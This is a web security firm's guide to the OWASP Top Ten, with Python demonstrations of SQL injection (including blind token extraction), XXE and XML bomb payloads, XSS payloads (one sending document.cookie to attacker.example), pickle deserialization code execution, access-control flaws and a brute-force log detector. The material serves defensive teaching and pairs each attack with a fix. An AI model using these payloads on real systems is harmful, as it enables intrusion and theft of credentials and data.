
In cyber security, the OWASP Top Ten is a key framework which helps organisations to understand the most common current web application vulnerabilities.

Read our guide to learn more about the issues to be aware of and how to reduce the risk of web application attacks.

 

What is the OWASP Top 10?

Recognised by developers and security professionals around the world, the OWASP Top Ten outlines the key categories of vulnerability which affect web application security. It is produced by the Open Web Application Security Project (OWASP), a not-for-profit foundation which helps organisations improve the security of their web applications. First published in 2003, the Top 10 has been revised periodically since then (2004, 2007, 2010, 2013 and 2017), and at the time of writing OWASP is accepting data submissions to help produce the next iteration of the framework.

The OWASP Top 10 ranks the most common web application security risks, enabling organisations to prioritise them according to prevalence, potential impact, ease of exploitation and ease of detection. The ten risks in the current (2017) list are described below.

 

1. Injection flaws

Injection flaws such as SQL, NoSQL, OS command and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. Hostile data supplied by an attacker can change the structure of that command, tricking the interpreter into executing unintended statements or returning data without proper authorisation.

Because the technique is easy to learn and execute, SQL injection is one of the most common ways of attacking web applications. Industry research has estimated that SQL injection accounts for more than 65% of web-based attacks.

A recent example of an injection flaw being exploited is the attack on the mobile banking company Dave, which led to the details of around 7.5 million of its customers being uploaded to the dark web.

Waydev, an analytics platform which Dave used, stored GitHub and GitLab OAuth tokens for its customers. It is thought that the attackers broke into Waydev's platform via a blind SQL injection vulnerability, stole the tokens from an internal database, and then used them to gain access to source repositories belonging to Dave and other companies.
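To make the mechanism concrete, here is an added example (not part of the original article, and not code from Dave, Waydev or any other product mentioned) using Python's standard sqlite3 module. It builds a constructed in-memory users table, shows the same lookup written with string concatenation and with a bound parameter, and then runs a boolean-based blind extraction of the kind reported in the Waydev incident against the vulnerable version: the application only ever answers "found" or "not found", yet the whole token leaks. The table, usernames and tokens are invented for the example.

```python
import sqlite3
import string


def build_db():
    """Constructed in-memory database standing in for an application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, api_token TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, api_token) VALUES (?, ?, ?)",
        [
            ("alice", "alice@example.com", "tok-alice-1111"),
            ("bob", "bob@example.com", "tok-bob-2222"),
            ("carol", "carol@example.com", "tok-carol-3333"),
        ],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Vulnerable: untrusted input is spliced into the SQL text, so it can change the query."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, username):
    """Fixed: the value is bound as a parameter and is only ever treated as data."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def exists_vulnerable(conn, username):
    """A 'does this user exist?' check that leaks one bit per request: the blind oracle."""
    return len(lookup_vulnerable(conn, username)) > 0


def exists_parameterised(conn, username):
    return len(lookup_parameterised(conn, username)) > 0


# Tautology: the WHERE clause becomes  username = 'x' OR '1'='1'  and matches every row.
TAUTOLOGY = "x' OR '1'='1"

# UNION: appends a second SELECT that returns a column the application never meant to expose.
UNION_PAYLOAD = "x' UNION SELECT username, api_token FROM users --"


def blind_extract_token(oracle, victim, charset=string.ascii_lowercase + string.digits + "-", max_len=32):
    """Recover the victim's api_token one character at a time from a true/false oracle.

    Each probe turns the query into
        WHERE username = '<victim>' AND substr(api_token,N,1)='<c>' --'
    so the application only ever answers found / not found, yet the secret leaks.
    """
    token = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"{victim}' AND substr(api_token,{pos},1)='{ch}' --"
            if oracle(probe):
                token += ch
                break
        else:
            break  # no character matched: we have read past the end of the token
    return token


if __name__ == "__main__":
    db = build_db()
    print("tautology      :", lookup_vulnerable(db, TAUTOLOGY))
    print("union          :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterised  :", lookup_parameterised(db, TAUTOLOGY))
    print("blind extraction:", blind_extract_token(lambda u: exists_vulnerable(db, u), "alice"))
```

The same inputs sent to the parameterised version return nothing, and the blind extraction against it recovers an empty string, because the quote and the `--` comment are simply part of a username that does not exist.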

 

2. Broken authentication

Broken authentication covers any weakness in an application's log-in and session-management mechanisms. It allows attackers to compromise passwords, keys or session tokens, or to exploit implementation flaws in order to assume other users' identities. Typical examples are applications that permit credential stuffing or brute-force attacks, where automated tools try large numbers of passwords against user accounts, and those that accept weak passwords, expose session identifiers in URLs or fail to invalidate sessions on logout.

 

3. Sensitive data exposure

Data such as credit card numbers, credentials and session tokens is commonly left inadequately protected by web applications and APIs, allowing attackers to steal it for identity theft, card fraud and other crimes. To prevent exposure, sensitive data should be encrypted in transit (TLS) and at rest, stored only where it is genuinely needed, and protected against application logic flaws that could permit unauthorised access.

In 2016, attackers stole the personal data of 57 million Uber customers and drivers. They used credentials found in a private GitHub repository used by Uber engineers to access data held in an Amazon S3 bucket, a case of sensitive credentials being exposed in source code. As well as covering up the breach for over a year, the company made a secret payment of around £75,000 (US$100,000) to the attackers to delete the data.

 

4. XML External Entities (XXE)

An XML External Entity vulnerability is a weakness in the way an application parses XML input. It occurs when attacker-supplied XML containing a DOCTYPE that declares an external entity (for example one pointing at a local file path or an internal URL) is processed by a weakly configured XML parser that resolves the reference.

Attackers use XXE to read local files from the server (such as configuration files and credentials), to make the server issue requests to internal systems (server-side request forgery), and to gather technical information used in further attacks. The related billion laughs attack, also known as an XML bomb, is a well-known Denial-of-Service technique: it declares nested entities that each reference the previous one many times, so a few kilobytes of input expand to gigabytes in memory. It uses internal rather than external entities, but it succeeds for the same reason XXE does, namely that the parser accepts and expands attacker-controlled DTD declarations. The defence in both cases is to disable DTD processing, or at least external entity resolution and entity expansion, in the parser configuration.
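The following is an added example (not part of the original article) showing why both problems come down to the DTD. It is a small pre-parse gate written in Python that inspects the entity declarations of an XML document without expanding anything: external entities are rejected outright, and the fully expanded size of every internal entity is computed by memoised recursion over the reference graph, so a billion laughs payload is recognised in linear time rather than by trying to build the output. The XXE payload and the benign document are constructed for the example, and the XML bomb is generated by the helper.

```python
import re

# Matches <!ENTITY name "value"> and <!ENTITY name SYSTEM|PUBLIC "..." ...> declarations.
ENTITY_DECL = re.compile(
    r"""<!ENTITY\s+(?P<name>[\w.-]+)\s+(?:(?P<kind>SYSTEM|PUBLIC)\s+)?(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)')"""
)
ENTITY_REF = re.compile(r"&([\w.-]+);")


def analyse_entities(xml_text, max_expansion=1_000_000):
    """Inspect the DTD of an XML document without expanding anything.

    Returns (verdict, detail). External entities are rejected outright (the XXE case);
    internal entities are accepted only if the fully expanded size of every one of them
    stays under max_expansion (the billion laughs case).
    """
    internal, external = {}, []
    for m in ENTITY_DECL.finditer(xml_text):
        value = m["dq"] if m["dq"] is not None else m["sq"]
        if m["kind"]:
            external.append((m["name"], value))
        else:
            internal[m["name"]] = value
    if external:
        return "reject: external entity", external

    sizes = {}

    def expanded_size(name, stack):
        if name in stack:
            raise ValueError(f"recursive entity {name}")
        if name in sizes:
            return sizes[name]
        value = internal[name]
        total = len(ENTITY_REF.sub("", value))  # literal characters in the value
        for ref in ENTITY_REF.findall(value):
            if ref in internal:
                total += expanded_size(ref, stack + (name,))
            else:
                total += len(ref) + 2  # undeclared reference (e.g. &amp;) stays as written
        sizes[name] = total
        return total

    try:
        worst = max((expanded_size(n, ()) for n in internal), default=0)
    except ValueError as exc:
        return f"reject: {exc}", None
    if worst > max_expansion:
        return "reject: entity expansion", worst
    return "ok", worst


def billion_laughs(depth=9, fanout=10):
    """Build the classic XML bomb: each level references the previous one `fanout` times."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = "".join(f"&{prev};" for _ in range(fanout))
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    body = "\n".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE lolz [\n{body}\n]>\n<lolz>&lol{depth};</lolz>'


# Constructed XXE payload: a classic attempt to read a local file via an external entity.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

# Constructed benign document: one small internal entity, nothing external.
BENIGN = """<?xml version="1.0"?>
<!DOCTYPE n [ <!ENTITY co "Example Ltd"> ]>
<n>&co; &amp; partners</n>"""


if __name__ == "__main__":
    for label, doc in [("xxe", XXE_PAYLOAD), ("bomb", billion_laughs()), ("benign", BENIGN)]:
        print(label, analyse_entities(doc))
```

With the defaults the nine-level bomb expands to 3,000,000,000 characters from under a kilobyte of input. A gate like this is a belt-and-braces check; the primary control is still the parser configuration (in Python, for instance, the defusedxml package provides drop-in parsers that refuse entity declarations altogether).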

 

5. Broken access controls

Access control refers to the process through which an application restricts what authenticated users may see or do. Broken access control (BAC) vulnerabilities occur when those restrictions are not properly enforced, for example when a user with limited privileges can read data that only a highly privileged user should be able to access, or can retrieve another customer's records simply by changing an identifier in a URL.

BAC vulnerabilities need not be exploited by a malicious attacker to cause harm: if one user's data is unintentionally exposed to another, the result can be a personal data breach under the GDPR.
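As an added illustration (example code, not from the original article), the following Python shows the identifier-substitution case beside its fix. The vulnerable handler checks only that the caller is logged in; the fixed one routes every read through a single deny-by-default policy, returns the same "not found" result for a forbidden record as for a missing one so the response does not confirm the identifier exists, and records denials, since repeated denials from one account are a useful signal of probing. The users, roles and invoices are invented for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "customer" or "support" in this example


class NotFound(Exception):
    pass


# Constructed data: invoices belonging to two different customers.
INVOICES = {
    1001: {"owner_id": 1, "amount": 120.00},
    1002: {"owner_id": 2, "amount": 87.50},
}

# Denied requests are recorded: repeated denials from one user are a strong signal of probing.
DENIED = []


def get_invoice_vulnerable(user, invoice_id):
    """Vulnerable: authentication happens elsewhere, but nothing ties the record to the caller,
    so any logged-in user can read any invoice by changing the id in the URL (an IDOR)."""
    if invoice_id not in INVOICES:
        raise NotFound(invoice_id)
    return INVOICES[invoice_id]


def can_read_invoice(user, invoice):
    """Central policy: deny by default, with explicit allow rules."""
    if user.role == "support":
        return True
    return invoice["owner_id"] == user.id


def get_invoice(user, invoice_id):
    """Fixed: every read goes through the policy, and a forbidden record is reported exactly
    like a missing one so the response does not confirm that the id exists."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not can_read_invoice(user, invoice):
        DENIED.append((user.id, invoice_id))
        raise NotFound(invoice_id)
    return invoice


if __name__ == "__main__":
    alice, agent = User(1, "customer"), User(3, "support")
    print("vulnerable, alice reads 1002:", get_invoice_vulnerable(alice, 1002))
    print("fixed, support reads 1002  :", get_invoice(agent, 1002))
    try:
        get_invoice(alice, 1002)
    except NotFound:
        print("fixed, alice reads 1002    : not found; denials =", DENIED)
```

In a real application the policy function would be the only place that answers "may this principal do this to this object", called from every handler; the bug class arises precisely when individual handlers are trusted to remember the check.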

 

6. Security misconfiguration

Security misconfiguration is a very common type of web application vulnerability. The term covers insecure default configurations, incomplete or ad hoc configurations, unnecessary features left enabled, and open cloud storage. Even a minor misconfiguration, such as verbose error messages that reveal stack traces or software versions, can give an attacker useful information.

Cloud security misconfigurations, such as databases exposed to the internet without authentication and publicly readable Amazon S3 buckets, are common. Research suggests that cloud misconfigurations in 2018 and 2019 led to the exposure of 33.4 billion records in enterprises around the world, at an estimated cost of as much as £3.85tn.

 

7. Cross-site scripting (XSS)

Cross-site scripting (XSS) flaws occur whenever an application includes untrusted data in a web page without proper validation or escaping, or updates a page with user-supplied data via a browser API that can create HTML or JavaScript. XSS flaws enable attackers to execute scripts in the victim's browser that can be used to hijack user sessions, deface websites or redirect users to malicious sites.

Cross-site scripting used to be a much bigger issue but now sits lower in the OWASP Top 10 because many application frameworks provide built-in output encoding. It has not gone away, however: a critical, now patched, vulnerability in video conferencing platform Zoom's sign-up process was recently identified as allowing an XSS attack.

Zoom's web platform, Zoom.us, failed to sanitise the user's name in the federated sign-up flow, enabling attackers to execute arbitrary JavaScript within a victim's browser. The victim would be manipulated into clicking a malicious link sent via a phishing email, after which the attacker's script ran with the victim's privileges, allowing it to read and change the user's settings.
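Here is an added example (not part of the original article, and not Zoom's code) in Python showing what "failing to sanitise the name" looks like and why the fix depends on where the value lands. It renders a user-supplied display name into an HTML body, into an attribute, and into JavaScript, with a vulnerable and a corrected version of each. The payloads are constructed: the second contains no angle brackets at all, which is why filters that only look for tags miss attribute breakouts.

```python
import html
import json

# Constructed attacker input, modelled on a display name submitted during sign-up.
PAYLOAD_NAME = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
# Attribute breakout: no angle brackets at all, so tag-based filters do not see it.
PAYLOAD_ATTR = 'x" onfocus="alert(document.domain)" autofocus="'


def render_welcome_vulnerable(display_name):
    """Vulnerable: the name is concatenated straight into HTML."""
    return f"<p>Welcome back, {display_name}!</p>"


def render_welcome(display_name):
    """Fixed for the HTML body context: every character significant to HTML is escaped."""
    return f"<p>Welcome back, {html.escape(display_name)}!</p>"


def render_input_vulnerable(display_name):
    """Escaping < > & but not quotes is not enough inside an attribute: the value can close
    the quote and add new attributes such as an event handler."""
    return f'<input name="display" value="{html.escape(display_name, quote=False)}">'


def render_input(display_name):
    """Fixed for the attribute context: quoted attribute plus quote escaping (the default)."""
    return f'<input name="display" value="{html.escape(display_name)}">'


def render_script_data(display_name):
    """Passing data to JavaScript: never build script source from strings. Either put the
    value in a data attribute (HTML-escaped) for the script to read, or emit a JSON literal
    with '<' escaped so a </script> inside the data cannot terminate the script block."""
    literal = json.dumps(display_name).replace("<", "\\u003c")
    return (
        f'<div id="user" data-name="{html.escape(display_name)}"></div>\n'
        f"<script>const userName = {literal};</script>"
    )


def contains_executable_injection(rendered):
    """Crude check used only for this demonstration: is the raw injected <script> tag or the
    injected event-handler attribute present, unescaped, in the output?"""
    return "<script>fetch" in rendered or ' onfocus="' in rendered


if __name__ == "__main__":
    for fn in (render_welcome_vulnerable, render_welcome, render_script_data):
        print(fn.__name__, "->", contains_executable_injection(fn(PAYLOAD_NAME)))
    for fn in (render_input_vulnerable, render_input):
        print(fn.__name__, "->", contains_executable_injection(fn(PAYLOAD_ATTR)))
```

The general rule is encode for the context you are writing into (HTML text, attribute, URL, JavaScript), do it at output time rather than on input, and let a templating engine with auto-escaping do it for you wherever possible.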

 

8. Insecure deserialization

In programming, serialization converts an object into a stream of bytes so that it can be stored in memory, in a file or in a database, or transmitted over a network. Deserialization is the reverse process, converting the bytes back into a live object that the program can use. Insecure deserialization occurs when an application deserializes data it does not control, including data sent by an attacker: a crafted byte stream can make the deserialization routine instantiate arbitrary classes and invoke their code, frequently leading to remote code execution.

Earlier this year, the networking hardware company Cisco had to develop an urgent fix for a critical remote code-execution (RCE) flaw in its customer interaction management product, Unified Contact Center Express (CCX). The flaw lay in the product's Java Remote Management Interface, which performed insecure deserialization of user-supplied content. An attacker could send a malicious serialized Java object to a specific listener on an affected system and, if successful, execute arbitrary code as the root user on the device.
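The Java case above is the best known, but the mechanism is the same in any language whose serialization format can name a callable. As an added example (not the original article's, and nothing to do with Cisco's code), here is the Python version using the standard pickle module: the attacker's object declares, via `__reduce__`, which function should be called on load, and `pickle.loads` obligingly calls it. `os.getcwd` is used as a harmless stand-in for `os.system`; the subclass that follows shows the allow-list approach to restricting what an unpickler may resolve.

```python
import io
import os
import pickle


class MaliciousPayload:
    """What an attacker serialises. pickle honours __reduce__, so on load it calls whatever
    callable this returns, with these arguments. os.getcwd is a harmless stand-in here;
    an attacker would return os.system or subprocess.Popen with a command string."""

    def __reduce__(self):
        return (os.getcwd, ())


def attacker_blob():
    """Constructed payload, exactly as an attacker would produce it on their own machine."""
    return pickle.dumps(MaliciousPayload())


def serialise(obj):
    """What a legitimate client sends: ordinary data structures."""
    return pickle.dumps(obj)


def load_vulnerable(blob):
    """Vulnerable: pickle.loads on attacker-controlled bytes runs the embedded call."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of the only classes this endpoint legitimately needs to rebuild."""

    ALLOWED = {("builtins", "set"), ("collections", "OrderedDict"), ("datetime", "date")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def load_restricted(blob):
    """Safer: any reference to a callable outside the allow-list aborts the load before it runs."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_refused(blob):
    """True if the restricted loader rejects the blob instead of materialising it."""
    try:
        load_restricted(blob)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = attacker_blob()
    print("vulnerable loader ran attacker's callable, returned:", load_vulnerable(blob))
    print("restricted loader refused it:", is_refused(blob))
    print("restricted loader still handles plain data:", load_restricted(serialise({"id": 7})))
```

The allow-list is a mitigation for code that cannot be changed; the real fix is not to accept native serialization formats from untrusted parties at all and to use a data-only format such as JSON with schema validation instead.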

 

9. Using components with known vulnerabilities

Applications and APIs that use components with known vulnerabilities may undermine application defences and provide attackers with a point of entry. Mitigation involves keeping all components used by web applications up to date, including the web server's operating system, the application runtime and the third-party libraries used in the application's code base, and tracking vendor advisories for each so that patches can be applied promptly.

An example of this flaw being exploited is the Citrix ADC (NetScaler) vulnerability CVE-2019-19781, which allows unauthenticated attackers to take over the device and pivot into an organisation's internal network. Exploitation of this vulnerability has led to many ransomware incidents and enabled criminal groups to extort millions of dollars from victims.

 

10. Insufficient logging & monitoring

Insufficient logging and monitoring, combined with missing or ineffective incident response, is another potentially serious risk: it can lead to breaches being missed altogether or to action being taken too late. Undetected exploitation of vulnerabilities allows attackers to maintain persistence, pivot to other systems, and tamper with, extract or destroy data. Typical gaps include failed logins and high-value transactions that are not logged, logs kept only on the local host where an attacker can alter them, and alerts that nobody reviews.

To minimise this risk, web application logs, including telemetry from web application firewalls, should be collected centrally and monitored alongside network and endpoint data. Formal incident response procedures, including the automation of playbooks, are also highly recommended to reduce the time it takes to respond to attacks.
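To show what "monitoring the logs" actually means for one of the attacks described earlier, here is an added example (not from the original article) of detection logic for the brute-force and credential-stuffing pattern mentioned under broken authentication, run over a handful of constructed application log lines. It keeps a sliding window of failed logins per source address, raises an alert when a source crosses a threshold inside the window, and raises a higher-severity alert if that same source then logs in successfully while the window is still open, which is the case that most needs a human to look at it. The log format, addresses (from documentation ranges) and usernames are invented for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application log lines: ISO timestamp, source IP, event, outcome, user.
SAMPLE_LOG = """\
2024-03-04T09:00:01 198.51.100.7 login FAIL user=jsmith
2024-03-04T09:00:03 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:04 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:05 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:06 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:07 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:08 203.0.113.5 login FAIL user=alice
2024-03-04T09:00:09 203.0.113.5 login OK user=alice
2024-03-04T09:00:30 198.51.100.7 login OK user=jsmith
2024-03-04T09:05:00 198.51.100.7 logout OK user=jsmith
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<event>\w+) (?P<outcome>OK|FAIL) user=(?P<user>\S+)$"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Sliding-window count of failed logins per source IP.

    Emits a 'brute_force' alert when a source reaches `threshold` failures inside `window`,
    and a 'success_after_brute_force' alert if that source then logs in successfully while
    the window is still open: the signature of an attack that worked.
    """
    failures = defaultdict(deque)  # src -> timestamps of recent failed logins
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["event"] != "login":
            continue  # unparseable or irrelevant event
        ts = datetime.fromisoformat(m["ts"])
        recent = failures[m["src"]]
        while recent and ts - recent[0] > window:  # drop failures older than the window
            recent.popleft()
        alert = {"src": m["src"], "user": m["user"], "at": m["ts"]}
        if m["outcome"] == "FAIL":
            recent.append(ts)
            if len(recent) == threshold:
                alerts.append({"type": "brute_force", "failures": len(recent), **alert})
        elif len(recent) >= threshold:
            alerts.append({"type": "success_after_brute_force", "failures": len(recent), **alert})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failure from 198.51.100.7 followed by a success is ordinary user behaviour and produces nothing; the six rapid failures from 203.0.113.5 produce the first alert, and the success that follows produces the second. In production the same logic runs in the SIEM over centrally collected logs, which is also what stops an attacker who has gained a shell from simply deleting the evidence on the host.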

 

Addressing web application security risks

As the OWASP Top Ten highlights, web applications are potentially vulnerable to a wide range of weaknesses. Checking for each vulnerability during the development process is vital.

Web application security can be addressed right from the outset of development by adopting a Security by Design approach. Organisations are also advised to regularly commission formal, independent web application penetration testing to identify and address new vulnerabilities that may have been missed.

 

OWASP penetration testing from Redscan

Web application testing is among the many security assessment services we offer at Redscan. Our ethical hackers comprehensively test for web application vulnerabilities, including those listed in OWASP’s current Top 10, and provide the support to help address them quickly and effectively.

At the end of each OWASP pen test, we provide a detailed report outlining the level of risk posed by each finding and the remediation advice required to address it.

Our pen testers work closely with you to understand your software application and help scope your requirements. Our CREST-accredited pen testing process is conducted to the highest legal, ethical and technical standards and follows best practice in key areas such as preparation & scoping, assignment execution, post technical delivery and data protection.
